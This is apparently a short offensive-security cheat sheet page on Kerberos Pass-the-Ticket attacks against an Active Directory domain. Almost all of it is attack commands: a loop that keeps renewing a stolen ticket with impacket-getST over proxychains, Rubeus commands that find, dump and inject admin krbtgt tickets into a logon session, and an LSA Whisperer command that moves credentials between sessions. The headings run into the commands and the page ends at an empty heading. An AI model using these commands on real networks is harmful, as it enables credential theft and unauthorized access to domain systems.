Pass-the-Ticket
$ while true; do KRB5CCNAME=j.doe@[email protected] proxychains4 -q impacket-getST -k -no-pass megacorp.local/j.doe -spn krbtgt/megacorp.local -renew; sleep 3600; doneRubeus
PS > .\Rubeus.exe triage | findstr krbtgt | findstr adminPS > .\Rubeus.exe dump [/service:krbtgt] [/luid:0x1337] /nowrapPS > .\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show
PS > .\Rubeus.exe ptt /luid:0x1337 /ticket:<BASE64_TICKET>LSA Whisperer
lsa> kerberos TransferCredentials --sluid <SRC_LUID> --dluid <DST_LUID>Manual Tickets Injection
Last updated